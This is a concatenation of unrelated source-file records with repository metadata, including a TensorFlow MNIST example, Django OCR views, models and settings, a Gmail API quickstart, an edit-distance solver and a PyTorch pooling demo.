self.kit = ServoKit(channels=16, address=self.i2c_address)
self.steering_motor = self.kit.continuous_servo[self.steering_channel]
self.throttle_motor = self.kit.continuous_servo[self.throttle_channel]
@traitlets.observe('steering')
def _on_steering(self, change):
self.steering_motor.throttle = change['new'] * self.steering_gain + self.steering_offset
@traitlets.observe('throttle')
def _on_throttle(self, change):
self.throttle_motor.throttle = change['new'] * self.throttle_gain | [
"[email protected]"
] | |
e6334f2a64f9a1b31d53af7cad6ac3abe5758f7d | 8cce0b5a4be09783016906a36192c52e9daa84aa | /cv_workshops/13-section/7-clazz.py | 4640afbe5beea856e54129e53ebbe39d9916db00 | [
"MIT"
] | permissive | Castrol68/opencv-practice | fcc9495553d3a10fb045c396697391a5d2a06f36 | 83d76132d004ebbc96d99d34a0fd3fc37a044f9f | refs/heads/master | 2023-08-31T07:18:51.497902 | 2020-05-03T17:43:12 | 2020-05-03T17:43:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,057 | py | #!/usr/bin/env python3
# -*- coding=utf-8 -*-
import tensorflow as tf
"""
TensorFlow - hello world
使用安装的TensorFlow 2.0并导入
"""
def main():
# 导入数据集, 数据集下载地址为: http://yann.lecun.com/exdb/mnist/
mnist = tf.keras.datasets.mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# 将整数数据集转换为浮点数
x_train, x_test = x_train / 255.0, x_test / 255.0
# 搭建Sequential模型,并将数据堆叠起来
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(input_shape=(28, 28)),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dropout(0.2),
tf.keras.layers.Dense(10, activation='softmax')
])
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
# 训练
model.fit(x_train, y_train, epochs=5)
# 验证
model.evaluate(x_test, y_test)
if "__main__" == __name__:
main()
| [
"[email protected]"
] | |
6ec621dff6324b2822383c42b374ac54637d859a | dc72e1eb44cfaed330d9477d0c27bee307a81e4a | /Jackpointnew/hand/scripts.py | 47913e46358e99f954ce1218749325896b5b7a09 | [] | no_license | bussiere/JackPointFInal | ba200d85606e17b423535af20a58c04bf5afa550 | c414480fee519e68aece68068e941278fe10cf0a | refs/heads/master | 2021-07-24T14:25:56.982106 | 2013-07-08T11:10:41 | 2013-07-08T11:10:41 | 5,333,141 | 0 | 0 | null | 2021-06-10T17:45:33 | 2012-08-07T20:29:46 | Python | UTF-8 | Python | false | false | 3,808 | py | from django.contrib.auth.models import User
from django.contrib.auth import authenticate
from django.contrib.auth.decorators import login_required
from django.contrib import auth
from skill.models import Skill
from carac.models import Carac
from item.models import Item
from carac.forms import CaracFormChoice
from skill.forms import SkillForm
from item.forms import ItemForm
from jack.forms import JackRegisterForm
from django.forms.formsets import formset_factory
from django.forms.formsets import BaseFormSet
from hand.forms import AskForm
from hand.models import Question,Answer
from jack.models import CaracUser,SkillUser,ItemUser
from tag.models import Tag
from engine.models import ThreadEngine
from engine.script import sendnotification
#TODO
# A factyoriser enregistrement skills carac items
def enregistrementAnswer(request):
user = User.objects.get(id=request.user.id)
reponse = request.POST['Reponse']
tags = request.POST['Tags']
threadengineid = int(request.POST['ThreadEngineId'])
threadengine = ThreadEngine.objects.get(id=threadengineid)
questionid = int(request.POST['QuestionId'])
tags = tags.split("#")
question = Question.objects.get(id=questionid)
answer = Answer.objects.create(user=user,Text=reponse)
answer.Question.add(question)
#TODO
# a factoriser
for tag in tags :
tag = tag.strip()
try :
result = Tag.objects.get(Name=tag)
except :
result = Tag.objects.create(Name=tag)
result.save()
answer.Tags.add(result)
answer.save()
threadengine.Answer.add(answer)
threadengine.save()
def enregistrementAsk(request,caracs,skills,items,intitule,description,tags) :
question = Question.objects.create()
question.save()
question.user = User.objects.get(id=request.user.id)
question.Text = description
question.Intitule = intitule
question.save()
#TODO
#Factoriser et expliquer les tags
tags = tags.split('#')
# TODO
# A factoriser
for tag in tags :
tag = tag.strip()
try :
result = Tag.objects.get(Name=tag)
except :
result = Tag.objects.create(Name=tag)
result.save()
question.Tags.add(result)
question.save()
for carac in caracs.keys():
caracdb = Carac.objects.get(Nom=carac)
try :
result = CaracUser.objects.get(carac=caracdb,Level=int(caracs[carac][0]))
except :
result = CaracUser.objects.create(Level=0)
result.Carac.add(caracdb)
result.Level = int(caracs[carac][0])
result.save()
question.Caracs.add(result)
for skill in skills.keys():
skilldb = Skill.objects.get(Nom=skill)
print "nomSki"
print skilldb.Nom
private = False
try :
result = SkillUser.objects.get(Skills=skilldb,Level=int(skills[skill][0]))
except :
result = SkillUser.objects.create(Level=0)
result.Skill.add(skilldb)
result.Private = private
result.Level = int(skills[skill][0])
result.save()
question.Skills.add(result)
for item in items.keys():
itemdb = Item.objects.get(Nom=item)
try :
result = ItemUser.objects.get(Item=itemdb)
except :
result = ItemUser.objects.create()
result.Item.add(itemdb)
result.Private = private
result.save()
question.Items.add(result)
question.save()
threadengine = ThreadEngine.objects.create()
threadengine.Question.add(question)
threadengine.save()
sendnotification(question,threadengine)
| [
"[email protected]"
] | |
68a6ad72b6ba110b69031ee89e2ee46750bbdae1 | 74be41563cba82ec784aed3c893a53261a428ab1 | /myapp/ocr_api/views.py | db6910d7ae1c32dea6bf6323e19f1305a4a8f71f | [] | no_license | Bakushin10/Django | e06ad485084d917886a50e5f3c38f8b049c85fb1 | 184db43f58e4679c2a556f9603f5e3bec61da1eb | refs/heads/master | 2022-12-12T13:34:24.391273 | 2019-11-05T14:33:29 | 2019-11-05T14:33:29 | 202,837,195 | 0 | 0 | null | 2022-12-08T06:53:31 | 2019-08-17T04:55:27 | Python | UTF-8 | Python | false | false | 5,626 | py | import os, sys, json
from PIL import Image, ImageDraw2
from django.shortcuts import render
from django.shortcuts import render, HttpResponseRedirect
from django.http import HttpResponse, JsonResponse
from ocr_api.models import OCRInputModel, JsonOCRInputModel
from ocr_api.serializers import OCRInputModelSerializer, JsonOCRInputModelSerializer
from django.views.decorators.csrf import csrf_exempt
@csrf_exempt
def post_dummy_data(request):
    """
    Demo POST endpoint: stores one hard-coded OCRInputModel row.

    The payload is fixed ({"ocrJson": "Two"}); the endpoint exists only to
    smoke-test the serializer/save round trip.
    """
    # NOTE(review): non-POST requests fall through and return None, which
    # Django turns into an HTTP 500 — confirm only POST is routed here.
    if request.method == "POST":
        data = {"ocrJson" : "Two"}
        serializer = OCRInputModelSerializer(data = data)
        if serializer.is_valid(raise_exception = True):  # raises 400 on invalid data
            data_saved = serializer.save()
        return HttpResponse("success: {} was created".format(data))
@csrf_exempt
def post_ocr_results(request):
    """
    **** Please dont call this API if data is already stored at endpoint ****
    Demo POST endpoint for OCR results: reads the bundled fixture JSON from
    disk and stores one JsonOCRInputModel row per entry.
    """
    if request.method == "POST":
        response = readJson()
        print("{} {} {}".format("*"*10, "tatal amount of data : ", len(response["response"])))
        print("{} {}".format("*"*10, request))
        for json_data in response["response"]:
            # print(json_data)
            x , y = [], []
            # NOTE(review): x collects the "y" values and y collects the "x"
            # values — looks like a deliberate row/column swap for image
            # coordinates, but confirm against detectTextOnImage's usage.
            for coordinate in json_data["coordinates"]:
                x.append(coordinate["y"])
                y.append(coordinate["x"])
            # Lists are stringified before storage; detectTextOnImage parses
            # them back by stripping brackets and splitting on commas.
            data = {
                "field" : str(json_data["field"]),
                "hasField" : json_data["hasField"],
                "coordinates" : str(json_data["coordinates"]),
                "x_coordinates" : str(x),
                "y_coordinates" : str(y),
                "text" : json_data["text"]
            }
            serializer = JsonOCRInputModelSerializer(data = data)
            if serializer.is_valid(raise_exception = True):
                data_saved = serializer.save()
    # NOTE(review): on a non-POST request `response` is unbound and this line
    # raises NameError — confirm only POST is routed here.
    return HttpResponse("{} {} {}".format("All ", len(response["response"]), " data posted!"))
@csrf_exempt
def get_ocr_results(request):
    """
    Return every stored OCR row as JSON, prefixed with a total-count header.
    """
    data = JsonOCRInputModel.objects.all()
    if request.method == "GET":
        serializer = JsonOCRInputModelSerializer(data, many = True)
        dataToDisplay = getDataToDisplay(serializer.data)
        return JsonResponse(dataToDisplay, safe = False)  # safe=False: top-level list
    # NOTE(review): non-GET requests return None (Django 500) — confirm routing.
@csrf_exempt
def get_ocr_results_by_id(request, username):
    """
    Return stored OCR rows whose ``field`` column equals *username*.

    NOTE(review): despite the name, the lookup key is ``field``, not a
    numeric id — confirm the intended filter.
    """
    if request.method != "GET":
        return HttpResponse("GET request only")
    data = JsonOCRInputModel.objects.filter(field=username)
    if len(data) == 0:
        return HttpResponse("no data found")
    # Renders the ValuesQuerySet's repr as the body, not structured JSON.
    return HttpResponse(data.values())
@csrf_exempt
def get_ocred_image(request):
    """
    Draw the stored OCR bounding boxes onto ``ocr_api/img/sample.jpg`` and
    return a JSON status payload (the image itself is written to disk, not
    returned).
    """
    data = JsonOCRInputModel.objects.all()
    SUCCESS_MESSAGE = {"image successfully ocred": "OK"}
    ERROR_MESSAGE = {"image could not be ocred": "ERROR"}
    if request.method == "GET":
        serializer = JsonOCRInputModelSerializer(data, many=True)
        image_path = "ocr_api/img/"
        image_name = "sample.jpg"
        try:
            drawLinesOnImages(image_path, image_name, serializer.data)
        except Exception:
            # Was a bare ``except:``, which also swallowed SystemExit and
            # KeyboardInterrupt; narrow to Exception so process-control
            # exceptions propagate.
            return JsonResponse(ERROR_MESSAGE, safe = False)
        return JsonResponse(SUCCESS_MESSAGE, safe = False)
    # NOTE(review): non-GET requests return None (Django 500) — confirm routing.
@csrf_exempt
def get_dummy_data(request):
    """
    Return every stored OCRInputModel row as JSON, prefixed with a
    total-count header (see getDataToDisplay).
    """
    data = OCRInputModel.objects.all()
    if request.method == "GET":
        serializer = OCRInputModelSerializer(data, many=True)
        dataToDisplay = getDataToDisplay(serializer.data)
        return JsonResponse(dataToDisplay, safe=False)
    # NOTE(review): non-GET requests return None (Django 500) — confirm routing.
def readJson():
    """
    Load the bundled OCR fixture JSON from disk and return it as a dict
    with a top-level "response" list.
    """
    #path = "ocr_api/json/test.json"
    path = "ocr_api/json/ocrReturnValues.json"
    #return ""
    # sys.path[0] is the directory of the entry-point script, so the fixture
    # resolves relative to the project root rather than the current CWD.
    with open(os.path.join(sys.path[0], path)) as f:
        data = json.load(f)
        print("{} {}".format("*"*10, data["response"]))  # debug dump of the payload
    return data
def getDataToDisplay(data):
    """Prefix the serialized rows with a human-readable total-count header."""
    header = "total amount data : {}".format(len(data))
    return [header] + data
def drawLinesOnImages(imagePath, imageName, data):
    """Draw the OCR bounding boxes onto the image; the separate text-box
    detection step is currently disabled."""
    detectTextOnImage(imagePath, imageName, data)
    # detectTextBoxOnImage(imagePath)
def detectTextOnImage(imagePath,imageName, data):
    """
    Draw a red outline on the image for each row's four corner coordinates
    and save the result next to the original as "ocred_<imageName>".
    """
    im = Image.open(imagePath + imageName)
    d = ImageDraw2.Draw(im)
    pen = ImageDraw2.Pen(color="red")
    for j in data:
        # Coordinates were stored as stringified lists (e.g. "[1, 2, 3, 4]");
        # strip the brackets and split back into the four corner values.
        x = j["x_coordinates"].replace("[","").replace("]","").split(",")
        y = j["y_coordinates"].replace("[","").replace("]","").split(",")
        #LB, LT, RT, RB = (c[0]["x"], c[0]["y"]), (c[1]["x"], c[1]["y"]), (c[2]["x"], c[2]["y"]), (c[3]["x"], c[3]["y"])
        # Corners in left-bottom, left-top, right-top, right-bottom order.
        LB, LT, RT, RB = (int(y[0]), int(x[0])), (int(y[1]), int(x[1])), (int(y[2]), int(x[2])), (int(y[3]), int(x[3]))
        d.line([LB, LT, RT, RB, LB], pen) #red line, closed by repeating LB
    im.save(imagePath + "ocred_" + imageName)
    print("image saved")
def detectTextBoxOnImage():
    """
    Detect the text box on a policy document. Unimplemented stub.

    NOTE(review): the commented-out call site in drawLinesOnImages passes an
    argument, but this signature takes none — reconcile before enabling.
    """
    pass
"[email protected]"
] | |
b1f831dc5b99ada2504bfeae16902b81d431db0e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03470/s172972650.py | 57f94dcf85afe314754def063304ba328d8d9803 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 140 | py | N = int(input())
# After sorting, every strictly increasing adjacent pair marks a new
# distinct value, so the answer is the number of distinct heights read.
heights = sorted(int(input()) for _ in range(N))
ans = 1 + sum(1 for lo, hi in zip(heights, heights[1:]) if lo < hi)
print(ans)
"[email protected]"
] | |
be170dcc3bdd5793fcc52084d7dd6184d1ea3928 | 51aa2894c317f60726fe9a778999eb7851b6be3e | /120_design_patterns/014_command/_exercises/templates/4-Command Pattern/Assignment/Solution/security_commands.py | dccb3920efff4cf8a244e3bb8df5cf9715871ec1 | [] | no_license | pranaymate/Python_Topics | dd7b288ab0f5bbee71d57080179d6481aae17304 | 33d29e0a5bf4cde104f9c7f0693cf9897f3f2101 | refs/heads/master | 2022-04-25T19:04:31.337737 | 2020-04-26T00:36:03 | 2020-04-26T00:36:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 455 | py | # ____ a__.s... ______ S..
# ____ c_a.. ______ AC..
#
#
# c_ SecurityArmCommand AC..
# ___ - security
# __ no. isi.. ? S..
# r_ T..
# ? ?
#
# ___ execute
# s____.a..
#
# ___ undo(
# s___.di..
#
#
# c_ SecurityDisarmCommand(AbsCommand):
# ___ - security
# __ no. isi.. ? S..
# r_ T..
# ? ?
#
# ___ execute
# s___.di..
#
# ___ undo
# s___.a.. | [
"[email protected]"
] | |
76b7b7fd8b8e98790d7b81290bc4cc77bea998c9 | a74a592d3e34c0cb2e19363a92410c520dc0ecda | /backend/course/models.py | 1ed6ffe755403a8dcb6cbf4e3dc54d87f002688f | [] | no_license | crowdbotics-apps/youthbuild-course-a-18675 | 5e4f0231b6127b215576c87593b8a073518200de | 4f17bfa2f588be23f24d862ca86fba569908e90e | refs/heads/master | 2022-11-08T20:55:36.094513 | 2020-07-07T19:33:25 | 2020-07-07T19:33:25 | 277,903,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,850 | py | from django.conf import settings
from django.db import models
class Course(models.Model):
    "A course authored by a user, optionally tagged with categories."
    author = models.ForeignKey(
        "users.User", on_delete=models.CASCADE, related_name="course_author",
    )
    title = models.CharField(null=True, blank=True, max_length=256,)
    description = models.TextField(null=True, blank=True,)
    categories = models.ManyToManyField(
        "course.Category", blank=True, related_name="course_categories",
    )
class Lesson(models.Model):
    "A single lesson (title, description, media URL) inside a module."
    module = models.ForeignKey(
        "course.Module", on_delete=models.CASCADE, related_name="lesson_module",
    )
    title = models.CharField(max_length=256,)
    description = models.TextField()
    media = models.URLField()
class Category(models.Model):
    "A named tag used to group courses."
    name = models.CharField(max_length=256,)
class Enrollment(models.Model):
    "Links a user to a course they are enrolled in."
    user = models.ForeignKey(
        "users.User", on_delete=models.CASCADE, related_name="enrollment_user",
    )
    course = models.ForeignKey(
        "course.Course", on_delete=models.CASCADE, related_name="enrollment_course",
    )
class Event(models.Model):
    "A scheduled event owned by a user."
    name = models.CharField(max_length=256,)
    user = models.ForeignKey(
        "users.User", on_delete=models.CASCADE, related_name="event_user",
    )
    date = models.DateTimeField()
class Module(models.Model):
    "A titled section of a course that groups lessons."
    course = models.ForeignKey(
        "course.Course", on_delete=models.CASCADE, related_name="module_course",
    )
    title = models.CharField(max_length=256,)
    description = models.TextField()
class SubscriptionType(models.Model):
    "A named subscription tier."
    name = models.CharField(max_length=256,)
class Recording(models.Model):
    "A published recording of an event, uploaded by a user."
    event = models.ForeignKey(
        "course.Event", on_delete=models.CASCADE, related_name="recording_event",
    )
    media = models.URLField()
    user = models.ForeignKey(
        "users.User", on_delete=models.CASCADE, related_name="recording_user",
    )
    published = models.DateTimeField()
class Group(models.Model):
    "A named group of users."
    name = models.CharField(max_length=256,)
class Subscription(models.Model):
    "Associates a user with a subscription type."
    subscription_type = models.ForeignKey(
        "course.SubscriptionType",
        on_delete=models.CASCADE,
        related_name="subscription_subscription_type",
    )
    user = models.ForeignKey(
        "users.User", on_delete=models.CASCADE, related_name="subscription_user",
    )
class PaymentMethod(models.Model):
    "A stored payment method belonging to a user."
    user = models.ForeignKey(
        "users.User", on_delete=models.CASCADE, related_name="paymentmethod_user",
    )
    # primary: whether this is the user's default method.
    primary = models.BooleanField()
    # token: opaque reference string — presumably issued by a payment
    # gateway rather than raw card data; confirm with the payment flow.
    token = models.CharField(max_length=256,)
# Create your models here.
| [
"[email protected]"
] | |
a3b0628f021f81f748f640274f9ddface28f23ea | 500b03fa6cb776c1d51db4a3a3aa252ddf5a50e6 | /book_exercise/py_intro/basics/Chapter 4: If statement/num_close.py | d5a70064327dbf0d92c9c632d600f35af5edadad | [] | no_license | carloslvm/learning-python | b3796a0a5b751baae8c551a9f6fe262f98980691 | 07f885454cf21b7d215a58da7fcb907715e546bd | refs/heads/master | 2022-07-27T21:39:11.937801 | 2022-07-09T17:47:56 | 2022-07-09T17:47:56 | 163,447,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | #!/usr/bin/python3
# Guessing a float number
num = 10.000
user_num = float(input('Try to guess the float number: '))

# Check the exact match FIRST. In the original ordering, the broad
# "anything other than 10.001/9.999" branch swallowed the correct guess of
# 10.000, so the equality branch was unreachable. ('no close' typo fixed.)
if user_num == num:
    print('That\'s correct.')
elif user_num == 10.001 or user_num == 9.999:
    print('You were close.')
else:
    print('You were not close.')
| [
"[email protected]"
] | |
677767ca7ceb624e8d26a88b9ec1aea211c9eb4c | 29f5b2d3a3582afad36ce03d23ac8e25743c7a1d | /quickstart.py | 4e6bea7265daf75d13f0f31247acd9327aebbe9f | [] | no_license | kylinRao/djangowebbuild | 9b1e1f32ae8b8872e950ff91658296d92113597e | 75a06b8e35d50176d824e3a4e790a79796c28f70 | refs/heads/master | 2021-01-19T04:32:49.411920 | 2016-06-08T01:33:38 | 2016-06-08T01:33:38 | 60,658,778 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,301 | py | from __future__ import print_function
import httplib2
import os
from apiclient import discovery
import oauth2client
from oauth2client import client
from oauth2client import tools
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
flags = None
# If modifying these scopes, delete your previously saved credentials
# at ~/.credentials/gmail-python-quickstart.json
SCOPES = 'https://www.googleapis.com/auth/gmail.readonly'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Gmail API Python Quickstart'
def get_credentials():
    """Gets valid user credentials from storage.

    If nothing has been stored, or if the stored credentials are invalid,
    the OAuth2 flow is completed to obtain the new credentials.

    Returns:
        Credentials, the obtained credential.
    """
    # Credentials are cached per-user in ~/.credentials/, created on demand.
    home_dir = os.path.expanduser('~')
    credential_dir = os.path.join(home_dir, '.credentials')
    if not os.path.exists(credential_dir):
        os.makedirs(credential_dir)
    credential_path = os.path.join(credential_dir,
                                   'gmail-python-quickstart.json')
    store = oauth2client.file.Storage(credential_path)
    credentials = store.get()
    if not credentials or credentials.invalid:
        # No (valid) cached credentials: run the interactive OAuth2 flow
        # and persist the result through `store`.
        flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
        flow.user_agent = APPLICATION_NAME
        if flags:
            credentials = tools.run_flow(flow, store, flags)
        else: # Needed only for compatibility with Python 2.6
            credentials = tools.run(flow, store)
        print('Storing credentials to ' + credential_path)
    return credentials
def main():
    """Shows basic usage of the Gmail API.

    Creates a Gmail API service object and outputs a list of label names
    of the user's Gmail account.
    """
    credentials = get_credentials()
    http = credentials.authorize(httplib2.Http())
    service = discovery.build('gmail', 'v1', http=http)
    # 'me' is the Gmail API alias for the authenticated user.
    results = service.users().labels().list(userId='me').execute()
    labels = results.get('labels', [])
    if not labels:
        print('No labels found.')
    else:
        print('Labels:')
        for label in labels:
            print(label['name'])
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
0006232e66e9b267c54344acf505f520ca34f480 | 0adf94fc39a02018165b62e93dd83edddd041230 | /.history/configurations/settings_20190226153809.py | 75cf74155e05e00a2fbe0afc31d36aded4447481 | [] | no_license | SabitDeepto/BrJobs | 1e3baa143331cf46b9c70911c6644d1efd4fffd6 | 1a458c8c667f8093a2325d963e5542655467c7aa | refs/heads/master | 2020-04-24T08:02:26.350007 | 2019-03-17T05:53:30 | 2019-03-17T05:53:30 | 171,818,024 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,011 | py | """
Django settings for configurations project.
Generated by 'django-admin startproject' using Django 2.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '+nu9r@lhaog&+yl!%vwmk1a-xed5!2ml&pm=n(t)(!8bed$^ny'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Test',
'Jobs',
'ckeditor',
'ckeditor_uploader',
'register',
'debug_toolbar',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
# ...
'debug_toolbar.middleware.DebugToolbarMiddleware',
# ...
]
ROOT_URLCONF = 'configurations.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'configurations.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
# AUTH_PASSWORD_VALIDATORS = [
# {
# 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
# },
# {
# 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
# },
# {
# 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
# },
# {
# 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
# },
# ]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Dhaka'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
#...
SITE_ID = 1
####################################
## CKEDITOR CONFIGURATION ##
####################################
CKEDITOR_JQUERY_URL = 'https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js'
CKEDITOR_UPLOAD_PATH = 'uploads/'
CKEDITOR_IMAGE_BACKEND = "pillow"
CKEDITOR_CONFIGS = {
'default': {
'toolbar': None,
},
}
###################################
# AUTH_USER_MODEL = 'Test.User'
# AUTH_USER_MODEL = 'TestApp.User'
LOGIN_REDIRECT_URL = '/'
LOGOUT_REDIRECT_URL = '/'
# AUTH_USER_MODEL = 'Jobs.User' | [
"[email protected]"
] | |
8bbe10ec9f9d538ff2af58beaee2fe77b23096dc | 5785d7ed431b024dd910b642f10a6781df50e4aa | /revise-daily/educative.io/medium-dp/longest-common-subsequence/11_edit_distance.py | 0afe28a66ab6ed5f3dc9fc015d21e758fbb667d4 | [] | no_license | kashyapa/interview-prep | 45d77324446da34d99bf8efedb3544b367b5523e | 7060c090c40602fb9c4778eace2078e1b51e235b | refs/heads/master | 2023-07-28T13:12:49.515299 | 2021-09-06T14:33:25 | 2021-09-06T14:33:25 | 403,706,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,004 | py | def find_min_operations(s1, s2):
return find_min_operations_recursive(s1, s2, 0, 0)
def find_min_operations_dp(s1, s2):
n1, n2 = len(s1), len(s2)
dp = [[-1 for _ in range(n2 + 1)] for _ in range(n1 + 1)]
# if s2 is empty, we can remove all the characters of s1 to make it empty too
for i1 in range(n1 + 1):
dp[i1][0] = i1
# if s1 is empty, we have to insert all the characters of s2
for i2 in range(n2 + 1):
dp[0][i2] = i2
for i1 in range(1, n1 + 1):
for i2 in range(1, n2 + 1):
# If the strings have a matching character, we can recursively match for the remaining lengths
if s1[i1 - 1] == s2[i2 - 1]:
dp[i1][i2] = dp[i1 - 1][i2 - 1]
else:
dp[i1][i2] = 1 + min(dp[i1 - 1][i2], # delete
min(dp[i1][i2 - 1], # insert
dp[i1 - 1][i2 - 1])) # replace
return dp[n1][n2]
def find_min_operations_recursive(s1, s2, i1, i2):
n1, n2 = len(s1), len(s2)
# if we have reached the end of s1, then we have to insert all the remaining characters of s2
if i1 == n1:
return n2 - i2
# if we have reached the end of s2, then we have to delete all the remaining characters of s1
if i2 == n2:
return n1 - i1
# If the strings have a matching character, we can recursively match for the remaining lengths
if s1[i1] == s2[i2]:
return find_min_operations_recursive(s1, s2, i1 + 1, i2 + 1)
# perform deletion
c1 = 1 + find_min_operations_recursive(s1, s2, i1 + 1, i2)
# perform insertion
c2 = 1 + find_min_operations_recursive(s1, s2, i1, i2 + 1)
# perform replacement
c3 = 1 + find_min_operations_recursive(s1, s2, i1 + 1, i2 + 1)
return min(c1, min(c2, c3))
def main():
print(find_min_operations("bat", "but"))
print(find_min_operations("abdca", "cbda"))
print(find_min_operations("passpot", "ppsspqrt"))
main()
| [
"[email protected]"
] | |
b532081aaa769fc56e4142beaeafe9cc3c22fc13 | ff4ab3a8aac4d26534d1d980f85f7b4ca3e0905b | /config.py | b909dff713e1be51064f9d8b0ab0d5244ecb1a54 | [] | no_license | pandeynandancse/Named_Entity_Reognition_BERT | be19db084079d035a59356cdf6ede8153f856055 | a6205240d312f6ca02b3ef5c8cc34512126815f0 | refs/heads/master | 2022-11-29T09:33:32.747433 | 2020-08-11T15:54:51 | 2020-08-11T15:54:51 | 286,786,451 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | import transformers
MAX_LEN = 128
TRAIN_BATCH_SIZE = 32
VALID_BATCH_SIZE = 8
EPOCHS = 10
BASE_MODEL_PATH = "../input/bert_base_uncased"
MODEL_PATH = "model.bin"
TRAINING_FILE = "../input/ner_dataset.csv"
#also can grab tokenizer from tokenizers library that is also from hugging face
TOKENIZER = transformers.BertTokenizer.from_pretrained(
BASE_MODEL_PATH,
do_lower_case=True # set to true becoz we are using bert uncased
)
| [
"[email protected]"
] | |
1d92cd4caf466194bc8dd0b7e0808a2f847ca1c2 | 093781f6a182c4988bb72c518e9747b723528e65 | /14_pooling.py | dc3c8a0f6d26c083f847ea87a72901437bc557b4 | [] | no_license | cjy02044027/quincy-pytorch | 889d821685865687853df8c080352e534ac71b0d | c6a226196ec3d7d23121291c3b5696ea57152f57 | refs/heads/master | 2023-01-12T10:46:39.394664 | 2020-02-14T06:23:10 | 2020-02-14T06:23:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,296 | py | #!usr/bin/env python
# -*- coding:utf-8 _*-
"""
@version:
author:yanqiang
@time: 2019/04/09
@file: main.py
@description: 最大池化和平均池化
"""
import torch
from torch import nn
print(torch.__version__)
# 二维最大池化层和平均池化层
def pool2d(X, pool_size, mode='max'):
    """2-D pooling with stride 1 and no padding.

    :param X: 2-D input tensor
    :param pool_size: (p_h, p_w) pooling-window height and width
    :param mode: 'max' for max pooling, 'avg' for average pooling
    :return: pooled float tensor of shape (H - p_h + 1, W - p_w + 1)
    :raises ValueError: on an unknown *mode* (previously an unknown mode
        silently returned an all-zero tensor)
    """
    if mode not in ('max', 'avg'):
        raise ValueError("mode must be 'max' or 'avg', got %r" % (mode,))
    X = X.float()
    p_h, p_w = pool_size
    Y = torch.zeros(X.shape[0] - p_h + 1, X.shape[1] - p_w + 1)
    for i in range(Y.shape[0]):
        for j in range(Y.shape[1]):
            window = X[i:i + p_h, j:j + p_w]
            Y[i, j] = window.max() if mode == 'max' else window.mean()
    return Y
X = torch.tensor([[0, 1, 2], [3, 4, 5], [6, 7, 8]])
print(pool2d(X, (2, 2)))
print(pool2d(X, (2, 2), 'avg'))
# 填充和步幅
X = torch.arange(16, dtype=torch.float).view((1, 1, 4, 4))
pool2d = nn.MaxPool2d(3)
print(pool2d(X))
pool2d = nn.MaxPool2d(3, padding=1, stride=2)
print(pool2d(X))
pool2d = nn.MaxPool2d((2, 4), padding=(1, 2), stride=(2, 3))
print(pool2d(X))
# 多通道
X = torch.cat((X, X + 1), dim=1)
print(X)
print(X.shape)
pool2d = nn.MaxPool2d(3, padding=1, stride=2)
